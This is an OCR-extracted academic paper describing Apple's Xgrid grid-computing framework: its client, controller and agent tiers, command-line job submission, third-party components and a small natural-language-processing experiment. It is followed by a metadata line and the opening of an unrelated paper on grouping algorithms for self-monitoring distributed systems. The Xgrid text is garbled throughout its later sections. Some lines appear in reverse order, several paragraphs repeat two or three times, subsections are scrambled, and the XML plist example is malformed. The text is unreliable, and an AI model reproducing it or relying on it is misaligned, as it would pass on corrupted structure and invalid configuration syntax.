included a dependency on Mac OS X Server (TP1 and TP2 did not require a server grade operating system), which allowed Apple to leverage the significant investment it had made in Mac OS X Tiger Server in the areas of scalability, single sign on, job specific authorization, server local and remote administration, server grade documentation, and the inclusion of a GUI based interaction model (TP1 and TP2 only had a CLI). 3 Solution Architecture The Apple Xgrid architecture is a standard three tier architecture consisting of a Client, Controller and Agent. We will review each of these tiers in turn. The Controller, Agent and Client can all exist on a single machine, although in practice, these are more typically distributed. 3.1 Client An Xgrid client provides the user interface to an Xgrid system. The client is responsible for finding a suitable controller, submitting a job, and retrieving the results. Clients can rely on the controller to mediate all job submissions; they do not need to be aware of the actual job execution schedule across available computational agents. It is useful to note that an Xgrid client is detachable from the network even while jobs are being executed - completed jobs are retrieved by the client from the controller once network connectivity is re-established. 3.2 Controller The controller, representing the middle tier, is the centre of the Xgrid framework. A controller typically runs on a dedicated system (like a cluster head node). The controller handles receiving jobs from clients, dividing them into tasks to execute on various agents, and collecting and returning the results. 3.3 Agent The final tier in the Xgrid solution is the Agent. Typically there is one agent per compute node, not dissimilar to other grid computing frameworks, although natively Xgrid agents on dual-CPU nodes default to accepting one task per CPU (similar policies are often implemented in a cluster LRMS). In similarity with other computational grid solutions, Xgrid allows for a range of agent types ranging from full-time agents, part-time (cycle stealing) agents, and remote agents (for distributed computational grids). 4 Xgrid Systems Configuration and Management The client, controller and agent software ships standard with Apple’s Mac OS X 10.4 (Tiger) operating system. As such, the systems management task is largely configuration oriented rather than installation oriented. A simplified configuration can be setup in less than 5 minutes, significantly reducing the barrier to entry for less technical users. Desktop systems or dedicated cluster nodes can be configured and enabled as Xgrid agents either locally through the Sharing pane in their System Preferences application, or remotely via SSH or one of Apple's network-based desktop management tools (Apple Remote Desktop, NetBoot, or Network Install). For larger installations as Xgrid supports the Apple NetBoot service which allows for nodes to load a standard configured operating system image from a central server (similar to the types of systems typically used for cluster management). Mac OS X Server systems are configured and enabled as Xgrid agents or controllers through the standard Server Admin application suite. Server installations provide the host infrastructure to manage authentication, which can include none, shared password, or Single Sign On (using a Kerberized service such as LDAP or Active Directory). Notably in this area Xgrid does not adopt the X.509 certificate based authentication prevalent in other computational grid middleware suites. Service control is also enabled via the Server Admin environment - in addition, there is a command line control interface for Xgrid, which allows service management (with the exception of authentication policies) from a shell environment. The discovery mechanism in Xgrid is that both clients and agents natively search for a controller. The controller is the only Xgrid component that requires an open TCP port for such discovery requests. All communications between clients, controllers and agents are able to be strongly encrypted over the network ensuring in transit security across segregated administrative domains. Xgrid can automatically discover available resources on a local network via a number of Apple services including ZeroConf, Rendezvous or Bonjour. Discovery is recursive within a domain or subdomain or Xgrid configurations can be created by manually entering IP addresses or hostnames. 5 Xgrid Job Management Xgrid jobs are expressed in Apple’s standard plist format (Apple, 2005a). Further details of the expression are provided in a later section in the context of the Xgrid Command Line Interface. Jobs can be submitted to the Xgrid controller using a range of client tools (discussed below). In all cases, an accompanying job specification is used by the controller to determine whether (and how) to decompose a submitted the job, the code and data payloads for a given job, and whether the job submission is to be synchronous or asynchronous. Xgrid controllers schedule jobs in the order they are received, assigning each task to the fastest agent available at that time (determined by active probing of the current computational load of each agent). Alternatively, the job specification allows for dependencies among jobs and tasks to be expressed to ensure scheduling in the proper order. In most cases, if any job or task fails, the scheduler will automatically resubmit it to the next available agent. Xgrid tasks using password-based authentication will minimize possible interactions with the rest of the system by executing as unprivileged Xgrid users (by default the system user nobody in the system’s /tmp directory). Tasks using single sign-on for both clients and agents will run as the submitting user, allowing appropriate access to local files or network services. Because of the three-tier architecture of Xgrid, clients can submit jobs to the controller asynchronously, then disconnect from the network as mentioned earlier. The controller will cache all the required data, manage scheduling and task-level failover, then hold and return all the results, including standard output and standard error from each task. If requested, the controller will notify the user via email that the job has been completed. The user can then retrieve the results from any authenticated Xgrid client system using the relevant job ID. 6 Xgrid System Scalability Apple’s published scalability benchmarks are relatively modest: Xgrid 1.0 has been tested on configurations of up to 128 agents; 20,000 queued jobs (or 100,000 tasks per job); 2Gb submitted data per job; 1Gb results per task; 10Gb aggregate results per job. Most notably, this testing is in a cluster (rather than distributed) mode. Some of these benchmarks have been exceeded, and are discussed further in the section entitled ‘Other Use Cases’ elsewhere in this paper. 7 Xgrid Native Components Having described the high level architecture of Xgrid, in this section we review the official Xgrid architecture and components as distributed in Xgrid 1.0. A diagrammatic representation can be seen in Figure 1. Here we proceed to describe the Xgrid clients, controller and agents in that order. 7.1 Xgrid Graphical User Interface Mac OS X ships with a simple GUI based interface to Xgrid called Xgrid.app, which supports only a few basic functions: view the Xgrid Agents and some basic properties for each Agent from a single Controller; submit single task jobs via a GUI; retrieve job status and results. This being said, Xgrid.app is a demonstrator application, and it is not promoted for tasks more complicated than basic testing. Other interfaces to be discussed next and in the third party section are much more fully featured. 7.2 Xgrid Command Line Interface The Xgrid framework has a well documented Command Line Interface (CLI) The Xgrid command line client is simply called xgrid. xgrid takes a number of parameters vis: executable and the input file or input file directory and the output file or output file directory Executables do not have to be supplied as transfer objects, they can be instantiated from a locally installed version of the executable. The executable (if required) and the file or directory is copied to the Agent, after which it is executed. Std error and result streams are returned to the controller after execution. Naturally such a simple set of parameters make it easy to wrap the CLI directly in a language such as Unix shell. The CLI can be instantiated in two different ways depending on whether synchronous or asynchronous execution is required. For synchronous execution: xgrid -h $HOSTNAME -job run -in $INPUTFILE -out $OUTPUT where $HOSTNAME is the fully qualified host name and domain; $INPUTFILE is the input file or directory containing the payload data; and $OUTPUTFILE is the output file or directory for the results. For asynchronous execution: xgrid -h $HOSTNAME -job submit -in $INPUTFILE -out $OUTPUT where the parameters are the same as for synchronous, although the command is changed from run to submit. The job submission process returns a numerical job identifier ($ID), which can then be used to query status of the job on the computational grid, vis: xgrid -job $ID The output of a status query includes a number of fields and corresponding values, vis: activeCPUpower (number of CPU cycles currently consumed by the job); applicationIdentifier (name of the application which instantiated the job); dateNow (current date and time); dateStarted (date and time the job was started); dateStopped (date and time the job finished); dateSubmitted (date and time the job was submitted); jobStatus (either running or finished); name (the executable name); percentDone (a numerical indicator of progress); taskCount (the number of tasks done); and undoneTaskCount (the number of tasks pending). The results of jobs can be retrieved again using the job identifier $ID, vis: xgrid -job results -id $ID. In addition to singular task jobs, the Xgrid CLI also supports multitask jobs by virtue of a batch mode which supports job specification via a plist (property list file similar in type to a the more commonly used plan file in other grid environments) (Apple, 2005). An example plist is shown below, this executes the Unix calendar program to generate the March 2005 output. ```plaintext { jobSpecification = { applicationIdentifier = "com.apple.xgrid.cli"; inputFiles = {}; name = "Calendar"; submissionIdentifier = calendar; taskSpecifications = { 0 = [arguments = (3, 2005); command = "/usr/bin/cal";] }; } ``` The CLI syntax for instantiation is slightly different with the use of a plist: xgrid -job batch $PLISTFILE. Likewise, a different status output from the Xgrid CLI in response to a query: (xgrid -job specification -id $ID) is as follows: ```plaintext jobSpecification = { applicationIdentifier = "com.apple.xgrid.cli"; inputFiles = {}; name = "Calendar"; submissionIdentifier = calendar; taskSpecifications = { 0 = [arguments = (3, 2005); command = "/usr/bin/cal";] }; } ``` A plist can be extended with multiple arguments or commands or both as necessary, each task with an arbitrary identifier. A plist can also be expressed as XML which adds a degree of flexibility as to how these job specifications are created. A plist expressed in XSL is shown below: ```xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "+//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> .plist version="1.0"> <dict> <key>jobSpecification</key> <dict> <key>applicationIdentifier</key> <string>com.apple.xgrid.cli</string> <key>inputFiles</key> <dict> <key>name</key> <string>Calendar</string> </dict> </key>submissionIdentifier</key> <string>calendar</string> <key>taskSpecifications</key> </dict> </dict> </plist> ``` In order to support developers building native Mac OS X GUI based applications, Apple provides XGridFoundation, a Mac OS X Cocoa framework based on ObjectiveC. XGridFoundation can be used by any Cocoa application by including the relevant header files eg. #import <XGridFoundation/XGridFoundation.h>. In order to understand the underlying architecture of the Xgrid framework, and because such frameworks are not particularly common among grid computing middleware suites, we consider in detail the specific classes exposed by XGridFoundation. First the classes themselves are described, in approximately the order they are encountered in a typical application. - XGConnection is used to represent a connection to an Xgrid server. It can be initialized with a host name, or via Bonjour. - XGAUTHENTICATOR is at connection instantiation, which requires some form of authentication with the Xgrid server. XGAUTHENTICATOR is an abstract class whose subclasses are used by an XGConnection to authenticate. - XGTwoWayRandomAUTHENTICATOR is a subclass of XGAUTHENTICATOR which used to perform password based authentication. - XGGSSAUTHENTICATOR is a subclass of XGAUTHENTICATOR which authenticates with Single Sign-On (eg LDAP). - XGController Instances of this class are proxies for Xgrid controllers. They are initialized with an XGConnection, and are used to submit jobs. - XGActionMonitor is a class used to monitor the activity of some asynchronous requests, such as submitting a job via an XGController. - XGResource is an abstract class which represents grid resources, like grids and jobs. Instances of subclasses of XGResource are proxies for entities on the Xgrid server. - XGGrid is a subclass of XGResource which represents the grids on the Xgrid controller. - XGJob is a subclass of XGResource which represents the jobs running on an Xgrid controller. - XGFile is a file or stream that is stored on the Xgrid controller. - XGFILEDOWNLOAD is a class used to retrieve files and streams from the Xgrid controller after a job is complete. A complete description of all Cocoa classes and methods can be found in (Apple, 2005b). A significant point of differentiation between Xgrid and other grid computing middleware suites is that the programmatic framework is fully vendor supported by Apple. ### 7.4 Xgrid Controller The Xgrid Controller has the primary task of managing communications between the various components of the Xgrid. It interfaces with the Clients (as described above) and the Agents (as described later). The controller interprets the job submissions from the client, and decomposes them as appropriate, then instantiates execution by transferring the job to the next available Agent. In addition, the Controller monitors each Agent directly, and determines availability to be based on the current CPU consumption on a given Agent with the lowest CPU consumption indicating the next available Agent. There can only be one Controller per logical grid, although each controller can have an arbitrary number of Agents connected to it. A Controller is typically hosted in a high availability network location, having a fixed IP address with access over TCP port 4111 required to be open for Agent and Client communication. Typically the Controller is installed on the same subnet as Agents and Clients, facilitating discovery using one of the various Apple resolution protocols. The Xgrid Controller has a command line administration tool xgridctl which can be used to start, stop and restart the Controller instance. This tool is very similar to the widely used apachectl, and can also be used to control a local agent via a simple command line switch. In addition to the command line administration of the Controller, Apple distributes the Xgrid Admin tool, which is a GUI administration tool for Xgrid, and is usable on any Mac running an Xgrid Client, Agent or Controller. The Xgrid Admin tool allows a user to login to a Controller and monitor its activities, including measuring its CPU capacity, reviewing pending, active and completed jobs; querying agents for their status and job progress etc. ### 7.5 Xgrid Tiger Agent The Xgrid Agent actually executes the computational tasks specified by a job. An Agent can belong to one virtual organisation at a time, by virtue of a relationship with a Controller. By default, an Agent will seek to bind to the first available Controller on a network, although this can be overwritten with a manual directive. The Xgrid Tiger Agent defaults to “part-time” mode, only accepting jobs if there has been no keyboard activity for 15 minutes on the host on which it is installed. Alternatively, an Agent can be configured to act as a dedicated node. Agent behaviour on an individual machine is subject to the usual Unix based resource allocation mechanisms - they can be jailed or chrooted, have storage, CPU or memory quotas set, and be monitored via standard system utilities. ### 7.6 Xgrid Panther Agent The Xgrid Panther Agent is identical to the Xgrid Tiger Agent above, except that it runs on machines installed with Mac OS X 10.3 (Panther). This solution is Apple’s advocated solution for enabling legacy Mac OS X based systems to be utilized in computational grids. The main features of XgridLite are the ability to use user preferences about output location. 8.4 XgridLite XgridLite (Baskerville, 2005) is an extension for Mac OS X 10.4 (Tiger) which emulates a full Controller on the standard version of Mac OS X Tiger. Hence, XgridLite is a drop in replacement for Mac OS X 10.4 (Tiger) Server’s Xgrid Controller, albeit with some feature reduction. The main features of XgridLite are the ability to manage the status of the Xgrid Controller directly; to set passwords for client and agent authentication; and administratively reset the Controller to default parameters. The main functions of PyXG are as follows. Xgrid executions can be instantiated from Python scripts and Python interactive sessions. Single task and batch Xgrid jobs can be submitted and managed from within Python; available grids and their corresponding status can be queried. Active Xgrid jobs can be listed, their status queried, and administrative actions such as delete, restart etc can be issued to jobs. The Python to Xgrid communication in PyXG is implemented through a set of Python classes that wrap the Xgrid command line directly. Thus, all xgrid parameters are available to PyXG. The Cocoa API is not used in PyXG. (The author of PyXG advises that a version of PyXg with Cocoa support is currently under development). 8.3 Gridbus Data Broker Interface Experimental support for Xgrid instantiation has been introduced in the Gridbus Data Broker (Venu-gopal, Buyya and Winton, 2004) since the release of version 2.2 (Assuncio et al, 2005). In essence this support equates to an XML job specification transformation from the internal Gridbus Data Broker’s format to match the Apple plist format, and a wrapper around the Xgrid command line interface to facilitate execution. The interested reader is referred to Assunciao et al (2005) for a more detailed treatment of the implementation and experimental evaluation. settings. Unlike the other third party components, XgridLite is not free, but is nominally priced shareware. 8.5 Xgrid Linux Agent In addition to third party components which provide alternative client interfaces to the Xgrid Controller, there is also an Xgrid Linux Agent (Cote, 2004) which extends the flexibility of an Xgrid-based computational grid to allow for alternative operating systems such as Linux. The Xgrid Linux Agent was one of the first third party components available for Xgrid. The Xgrid Linux Agent compiles on a range of Linux and Unix variants including Debian, RedHat, Solaris and OpenDarwin. Using the Xgrid Linux Agent, an native Xgrid Controller is required. Additionally, the application instances need to be constructed in such a way that they are either aware of the multi-architecture nature of the computational grid, or so that they are architecture independent. A notable point is also that the Xgrid Linux Agent only supports operation in the passwordless authentication mode. 8.6 XgridAgent-Java XgridAgent-Java (Campbell, 2005) is a pure Java Agent for Xgrid written entirely in Java. The primary motivation of this project is to provide a platform independent Xgrid agent, allowing for heterogeneous Xgrid clusters to be deployed. XgridAgent-Java utilises a number of open source components including JmDNS (van Hoff and Blair, 2005), BEEPCoreJava (Franklin, 2005) and Base64 (Brower, 2005). XgridAgent-Java supports dynamic resolution of an Xgrid cluster controller via a range of Apple supported resource discovery services (either ZeroConf or Rendezvous or Bonjour), all via JmDNS. BEEPCoreJava is used to handle the BEEP layer of the Xgrid protocol. Base64 is used to handle binary elements in the Apple XML plist layer of the protocol. 9 Experimental Experience In evaluating the Xgrid framework, we have deployed three small scale, al grids. The specifications for each of the relevant grids is described in the tables below, along with the location information for each node. 9.1 Infrastructure In Grid 1 (Figure 3), a small cluster configuration is the infrastructure model selected, with native Xgrid components being deployed. In Grid 2 (Figure 4), we use the same cluster arrangement, hardware and operating system as in Grid 1, except we replace the native Xgrid components with relevant third-part components. In Grid 3 (Figure 5), a range of processor architectures and operating systems are featured on the Xgrid, demonstrating the considerable flexibility in building heterogeneous Xgrid’s using third-party components. Grid 3 is also distributed geographically, with infrastructure in multiple Australian locations, in Europe and in the USA. A point of considerable interest in the specifications of these test grids is that despite Xgrid being an Apple product, through the utilisation of 3rd party middleware bindings, the Xgrid environment can be deployed across multiple hardware and software platforms. In essence the difference between Grid 1, Grid 2 and Grid 3 is that Grid 1 was deployed using the native Xgrid components; Grid 2 was deployed using third party components over the same hardware as Grid 1, whereas Grid 3 was deployed using a combination of native and third party Xgrid 1.0 components over variable hardware and operating systems. More specifically in Grid 1 we used the native Xgrid Command Line Interface as the Client; the native Xgrid Controller as the Controller; and the native Xgrid Agent for the Agents. Contrastively in Grid 2 we used GridStuffer as the Client, the XgridLite Controller, and XgridAgent-Java for the Agents. In Grid 3 PyXG was used as the Client; the native Xgrid Controller was used as the Controller; and both Xgrid Linux Agent and XgridAgent-Java were used for the Agents. 9.2 Experiments The experimental grids were used to perform a natural language processing task. This paper does not intend to report detailed metrics for this particular task, but rather used it as a method of testing the Xgrid framework. For reference the experimental task is to annotate the English Gigaword Corpus (Graff, 2002) with Part of Speech (POS) tags. The analysis and annotation is performed using the Python-based Natural Language Toolkit (Bird and Loper, 2004). The task is embarrassingly parallel in the dimension of the corpus segmentation: 314 individual files with an average size of 38 Mb per file; the total corpus is 12Gb in size. The Natural Language Toolkit is installed locally on each of the agent systems, with the input data and a processing script transferred from the client to the controller to the agents, and back at the end of the experiment. On Grid 1 (the cluster configuration with native Xgrid components) processing the entire end to end task took approximately 380 minutes of wall clock time to complete (with network transfer overhead being very low, owing to the Client being on the same LAN as the Controller and Agents). On Grid 2 (the cluster configuration with third-party components) processing the entire end to end task took approximately 402 minutes of wall clock time. Again the network transfer overhead being very low, owing to the Client being on the same LAN as the Controller and Agents. On Grid 3 (the larger distributed heterogeneous configuration) processing the entire end to end took approximately 670 minutes of wall clock time. The network transfer overhead in this context was considerably higher given the international transfers required to move data to the nodes in the USA and Europe). However, because the computational grid consisted of more nodes, naturally a greater degree of parallelism was achieved. It is interesting to note that there is only a statistically insignificant difference between elapsed time between Grid 1 and Grid 2, despite the substitution of third party components in place of native Xgrid components. Detailed instrumentation was not implemented, but anecdotal evidence suggests that the overall performance of Grid 2 using third party components is very comparable to the native Xgrid alternative. The distributed nature of the task in Grid 3 increases the overall time required to complete the task, which is not to be unexpected given the network transfer time for 12Gb of data, some of which is transferred to locations in the USA and Europe. While the purpose of this paper is specifically not to report experimental results, it is important to note that this scale of task can be robustly completed using either the native Xgrid components or the third- Xgrid is already shipped standard with the operating coupled computational environments. The fact that to effectively access the power of distributed, loosely barrier to entry for grid computing - with simple setup the Xgrid platform. tions into the relative strengths and weaknesses of conclusion, it is useful to generalise these observa- cations of LDraw models (University of Utah Sta- tation at Reed College); rendering POV-Ray ani- demiological model (Center for Advanced Compu- ing: modeling of biochemical receptors (Stanford Uni- versity); nonlinear-system computations for an epi- demic situations and infrastructure models, summarised below. For reference there were 11 responses to the survey which were sent to the list directly, other private replies to the Xgrid product manager may have been received. The majority of users who responded are using Xgrid 1.0 (63%) with the remainder using Technology Preview 2 with forward migration plans (37%). The size of computational grids ranged up to 300 part time (ie cycle stealing) nodes; for full time nodes the largest grid had 60 compute nodes. The usage domains included graphics rendering, spatial analysis, population epidemiological model (Center for Advanced Computation at Reed College); rendering POV-Ray an- imation of LDraw models (University of Utah Stu- dent Computing Labs) finding low autocorrelation studies. Another explicit weakness in the Xgrid framework at date is the lack of a cross plat- form client implementation - even clients provided by third parties currently just wrap the existing CLI. As such, Xgrid, while open at the Agent tier, is not open at the Client tier, binding users to a Mac OS X client. For extensibility of the Xgrid framework into the wider grid computing community, this issue must be addressed. Furthermore, the lack of any explicit agent capability specification, while grounded in Apple’s intention that the Xgrid framework only be deployed over its own hardware is a significant short- While clearly not of the same level of maturity as other widely utilised grid middleware such as Globus, the Apple Xgrid product does provide a number of advantages (particularly in the area of ease of use), which we believe will lead to widespread ad-hoc adoption within research communities and as such represents a significant advantage. Typical of Apple’s engagement with a wide range of applications, Xgrid vastly simplifies the task of building a computational grid and using a computational grid to execute tasks. ### 10 Other Use Cases An interesting metric by which to assess the success or otherwise of the Xgrid framework is the degree to which it has been adopted. An informal survey on the xgrid-users list in July 2005 revealed a range of application domains and infrastructure models, summarised below. For reference there were 11 responses to the survey which were sent to the list directly, other private replies to the Xgrid product manager may have been received. The majority of users who responded are using Xgrid 1.0 (63%) with the remainder using Technology Preview 2 with forward migration plans (37%). The size of computational grids ranged up to 300 part time (ie cycle stealing) nodes; for full time nodes the largest grid had 60 compute nodes. The usage domains included graphics rendering, spatial analysis, population epidemiological model (Center for Advanced Computation at Reed College); rendering POV-Ray animation of LDraw models (University of Utah Student Computing Labs) finding low autocorrelation studies. Another explicit weakness in the Xgrid framework at date is the lack of a cross platform client implementation - even clients provided by third parties currently just wrap the existing CLI. As such, Xgrid, while open at the Agent tier, is not open at the Client tier, binding users to a Mac OS X client. For extensibility of the Xgrid framework into the wider grid computing community, this issue must be addressed. Furthermore, the lack of any explicit agent capability specification, while grounded in Apple’s intention that the Xgrid framework only be deployed over its own hardware is a significant shortcoming. While clearly not of the same level of maturity as other widely utilised grid middleware such as Globus, the Apple Xgrid product does provide a number of advantages (particularly in the area of ease of use), which we believe will lead to widespread ad-hoc adoption within research communities and as such represents a significant advantage. Typical of Apple’s engagement with a wide range of applications, Xgrid vastly simplifies the task of building a computational grid and using a computational grid to execute tasks. ### 11 Discussion and Conclusion This paper has offered a range of observations on specific issues with the Xgrid platform throughout. In conclusion it is useful to generalise these observations into the relative strengths and weaknesses of the Xgrid platform. On the positive side, Xgrid represents a very low barrier to entry for grid computing - with simple setup and administration - allowing for a new range of users to effectively access the power of distributed, loosely coupled computational environments. The fact that Xgrid is already shipped standard with the operating system is a distinct further advantage. Increasingly too, native Xgrid support is being offered by application vendors (with application domains ranging from digital image processing to mathematics to bioinformatics), which allows end users to rely on vendor support directly for embarrassingly parallel computations. This is not to say that the Xgrid framework does not have some (arguably considerable) disadvantages. Xgrid also introduces another authentication paradigm, while not incompatible with the well entrenched X.509 frameworks given appropriate middle- ware, are likely to represent problems for the connect- ation of Xgrid based infrastructure with the broader grid communities. Another explicit weakness in the Xgrid framework to date is the lack of a cross platform client implementation - even clients provided by third parties currently just wrap the existing CLI. As such, Xgrid, while open at the Agent tier, is not open at the Client tier, binding users to a Mac OS X client. For extensibility of the Xgrid framework into the wider grid computing community, this issue must be addressed. Furthermore, the lack of any explicit agent capability specification, while grounded in Apple’s intention that the Xgrid framework only be deployed over its own hardware is a significant shortcoming. While clearly not of the same level of maturity as other widely utilised grid middleware such as Globus, the Apple Xgrid product does provide a number of advantages (particularly in the area of ease of use), which we believe will lead to widespread ad-hoc adoption within research communities and as such represents a significant advantage. Typical of Apple’s engagement with a wide range of applications, Xgrid vastly simplifies the task of building a computational grid and using a computational grid to execute tasks. ### References <table> <thead> <tr> <th>Hardware</th> <th>OS</th> <th>Role</th> <th>Location</th> </tr> </thead> <tbody> <tr> <td>1 x G5 PPC</td> <td>OSX 10.4</td> <td>Controller</td> <td>Xgrid Controller</td> </tr> <tr> <td>1 x G3 PPC</td> <td>OSX 10.4</td> <td>Client</td> <td>PyXG</td> </tr> <tr> <td>4 x G4 PPC</td> <td>OSX 10.4</td> <td>Agent</td> <td>Xgrid Tiger Agent</td> </tr> <tr> <td>1 x G5 Intel</td> <td>OSX 10.4</td> <td>Agent</td> <td>Xgrid Tiger Agent</td> </tr> <tr> <td>1 x P4 1386</td> <td>Linux</td> <td>Agent</td> <td>XgridAgent-Java</td> </tr> <tr> <td>1 x P4 1386</td> <td>Linux</td> <td>Agent</td> <td>XgridAgent-Java</td> </tr> <tr> <td>2 x P4 1386</td> <td>Windows XP</td> <td>SP2</td> <td>Agent</td> </tr> <tr> <td>1 x P4 1386</td> <td>Linux</td> <td>Agent</td> <td>XgridAgent-Java</td> </tr> <tr> <td>1 x AMD 1386</td> <td>Linux</td> <td>Agent</td> <td>XgridAgent-Java</td> </tr> <tr> <td>1 x P4 1386</td> <td>Linux</td> <td>Agent</td> <td>XgridAgent-Java</td> </tr> <tr> <td>1 x P4 1386</td> <td>Linux</td> <td>Agent</td> <td>XgridAgent-Java</td> </tr> <tr> <td>1 x P4 1386</td> <td>Linux</td> <td>Agent</td> <td>XgridAgent-Java</td> </tr> <tr> <td>1 x AMD 1386</td> <td>Linux</td> <td>Agent</td> <td>XgridAgent-Java</td> </tr> </tbody> </table> **Figure 5: Experimental Grid 3** **Acknowledgements** The research in this paper has been supported by Apple Computer Inc, through the Apple University Consortium and the Apple University Development Fund. I am grateful to Ernest Prabakhar and Richard Crandall from Apple comments on an earlier version of this paper. Additionally I wish to thank my colleagues who facilitated the availability of remote systems to use in testing the Xgrid framework: Ewan Klein at the University of Edinburgh; Terry Langendoen at the University of Arizona; Kaja Christiansen at the University of Aarhus; Paul Edwards at The University of Melbourne; and Andrew Smith at the University of Queensland.
{"Source-Url": "https://minerva-access.unimelb.edu.au/bitstream/handle/11343/34097/66515_00001596_01_CRPITV54Hughes.pdf?isAllowed=y&sequence=1", "len_cl100k_base": 8232, "olmocr-version": "0.1.50", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 27254, "total-output-tokens": 9823, "length": "2e13", "weborganizer": {"__label__adult": 0.00028705596923828125, "__label__art_design": 0.0004367828369140625, "__label__crime_law": 0.00030541419982910156, "__label__education_jobs": 0.0015935897827148438, "__label__entertainment": 0.00011307001113891602, "__label__fashion_beauty": 0.000164031982421875, "__label__finance_business": 0.0005192756652832031, "__label__food_dining": 0.00023066997528076172, "__label__games": 0.000499725341796875, "__label__hardware": 0.0020904541015625, "__label__health": 0.0004050731658935547, "__label__history": 0.0003862380981445313, "__label__home_hobbies": 0.00012052059173583984, "__label__industrial": 0.00058746337890625, "__label__literature": 0.0003020763397216797, "__label__politics": 0.0002646446228027344, "__label__religion": 0.00041961669921875, "__label__science_tech": 0.1695556640625, "__label__social_life": 0.00012600421905517578, "__label__software": 0.04302978515625, "__label__software_dev": 0.77783203125, "__label__sports_fitness": 0.0002104043960571289, "__label__transportation": 0.0005278587341308594, "__label__travel": 0.0002083778381347656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 42957, 0.02673]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 42957, 0.18476]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 42957, 0.90436]], "google_gemma-3-12b-it_contains_pii": [[0, 5022, false], [5022, 11543, null], [11543, 16673, null], [16673, 21920, null], [21920, 23861, null], [23861, 30418, null], [30418, 38168, null], [38168, 42957, null], [42957, 42957, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5022, true], [5022, 11543, null], [11543, 16673, null], [16673, 21920, null], [21920, 23861, null], [23861, 30418, null], [30418, 38168, null], [38168, 42957, null], [42957, 42957, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 42957, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 42957, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 42957, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 42957, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 42957, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 42957, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 42957, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 42957, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 42957, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 42957, null]], "pdf_page_numbers": [[0, 5022, 1], [5022, 11543, 2], [11543, 16673, 3], [16673, 21920, 4], [21920, 23861, 5], [23861, 30418, 6], [30418, 38168, 7], [38168, 42957, 8], [42957, 42957, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 42957, 0.06757]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
6ff0e3a19d7f1b580baab9b5f2396976557b3160
Grouping Algorithms for Scalable Self-Monitoring Distributed Systems Benjamin Satzger and Theo Ungerer Department of Computer Science University of Augsburg 86159 Augsburg, Germany {satzger, ungerer}@informatik.uni-augsburg.de ABSTRACT The growing complexity of distributed systems demands for new ways of control. Future systems should be able to adapt dynamically to the current conditions of their environment. They should be characterised by so-called self-x properties like self-configuring, self-healing, self-optimising, self-protecting, and context-aware. For the incorporation of such features typically monitoring components provide the necessary information about the system’s state. In this paper we propose three algorithms which allow a distributed system to install monitoring relations among its components. This serves as a basis to build scalable distributed systems with self-x features and to achieve a self-monitoring capability. Evaluation measurements have been conducted to compare the proposed algorithms. Categories and Subject Descriptors C.2 [Computer-Communication Networks]: Distributed Systems General Terms Algorithms Keywords grouping, failure detection, scalable, distributed system, algorithm, self-monitoring 1. INTRODUCTION The initiatives Organic Computing (OC) [20] and Autonomic Computing (AC) [12, 13] both identify the exploding complexity as a major threat for future computer systems and postulate so-called self-x properties for these systems. To achieve these goals both the OC [15] and the AC community [13] regard monitoring information as a basis for organic or autonomic systems. 2. RELATED WORK To supply adequate support for large scale systems, hierarchical failure detectors define some hierarchical organisation. Bertier et al. [3] introduce a hierarchy with two levels: a local and a global one, based on the underlying network topology. The local groups are LANs, bound together by a global group. Within each group any member monitors all other members. Different from Bertier et al. [3], in this work the existence of some classifying concept like a LAN is not required. Monitoring groups can be built also within a network of equal nodes. A hierarchy as proposed in [3] is not further investigated in this work, but could be easily built upon the monitoring groups which are introduced later on. Another hierarchical failure detector is presented by Felber et al. [7]. They emphasise the importance of well defined interfaces for failure detectors being able to e.g. reuse existing failure detectors. Gossipping is a method of information dissemination within a distributed system by information exchange with randomly chosen communication partners. In 1972, Baker and Shostak [2] discussed a gossipping system with ladies and telephones. They investigated the problem of n ladies, each of them knows some item of gossip not known to the others. They... use telephones to communicate, whereas the ladies tell everything they know at that time whenever one lady calls another. The problem statement was “How many calls are required before each lady knows everything?” Demers et al. [9] pioneered gossipping in computer science as a way to update and ensure consistent replicas for distributed databases. Van Renesse et al. [14] have been the first using gossipping for failure detection to cope with the problem of scalability. In their basic algorithm each process maintains a list with a heartbeat counter for each known process. At certain intervals every process increments its own counter and selects a random process to send its list to. Upon receipt of a gossip message the received list is merged with its own list. Each process also maintains the last time the heartbeat counter has increased for any node. If this counter is increased for a certain time then the process is considered to have failed. Additionally to this basic gossipping, the authors specify a multi-level gossipping algorithm that does not choose the communication partners completely randomly but dependent on the underlying network. Basically, they try to concentrate the traffic within subnets and to decrease it across them. Thus the scalability can be further improved. A disadvantage is that the size of gossip messages grows with the size of processes what causes a relatively high network traffic. Furthermore the timeout to prevent false detections has to be rather high and since every process checks failures of processes by its own, false detections cause inconsistent information. The SWIM protocol, based on the work of Gupta et al. [10] and described in a paper of Das et al. [5], faces the mentioned drawbacks as it uses a separate failure detector and failure dissemination component. The failure detector component detects failures while the dissemination component distributes information about processes that have recently either left, or joined, or failed. Each process periodically sends a ping message to some randomly chosen process and waits for it to request. In this way failures can be detected and are then disseminated by a separate gossip protocol. The separation of failure detection and further components as proposed in [5] is taken up in this work. While the previous chapter introduces the failure detection component, here the 